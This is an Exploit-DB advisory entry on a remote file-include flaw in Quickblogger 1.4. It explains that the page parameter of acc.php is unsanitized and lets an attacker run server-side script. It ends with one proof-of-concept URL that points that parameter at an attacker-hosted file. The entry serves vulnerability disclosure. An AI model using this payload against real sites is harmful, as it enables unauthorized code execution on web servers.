Quickblogger 1.4 - Remote File Include Vulnerability

2006-09-25T00:00:00
ID EDB-ID:28691
Type exploitdb
Reporter You_You
Modified 2006-09-25T00:00:00

Description

Quickblogger 1.4 Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20210/info

Quickblogger is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Quickblogger version 1.4 is vulnerable to these issues.

http://www.example.com/[path]/acc.php?page=attacker's_file